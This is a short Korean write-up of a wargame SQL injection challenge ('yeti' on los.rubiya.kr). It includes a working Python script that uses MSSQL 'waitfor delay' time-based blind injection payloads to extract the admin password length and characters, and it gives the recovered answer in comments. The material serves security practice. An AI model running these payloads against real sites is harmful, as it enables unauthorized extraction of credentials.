첫 화면이다.
Blind SQLi 문제로 인식을 했고, 출력으로 확인할 방법이 없으니 Time-based Blind SQLi로 풀기로 하였다.
waitfor delay를 사용한다.
파이썬 코드를 짜면 아래와 같다.
import requests
import time
URL = 'https://los.rubiya.kr/chall/yeti_e6afc70b892148ced2d1e063c1230255.php?pw='
PHPSESSID = 'MY_PHPSESSID'
SLEEP = 2
def query(payload):
start = time.time()
cookies = {'PHPSESSID': PHPSESSID}
requests.post(URL + payload, cookies=cookies)
if time.time() - start > SLEEP:
return True
else:
return False
# 8
def find_pw_length():
pw_len = 1
while query("' if(len((select pw from prob_yeti where id='admin'))={}) waitfor delay '00:00:0{}'--".format(pw_len, SLEEP)) is False:
pw_len += 1
print('pw_len: {}'.format(pw_len))
return pw_len
# 6425b725
def find_pw():
pw_len = find_pw_length()
pw = ''
for pos in range(1, pw_len + 1):
for character in range(0, 128):
if query("' if(unicode(substring((select pw from prob_yeti where id='admin'),{},1))={}) waitfor delay '00:00:0{}'--".format(pos, character, SLEEP)) is True:
pw += chr(character)
break
print('pw: {}'.format(pw))
find_pw()
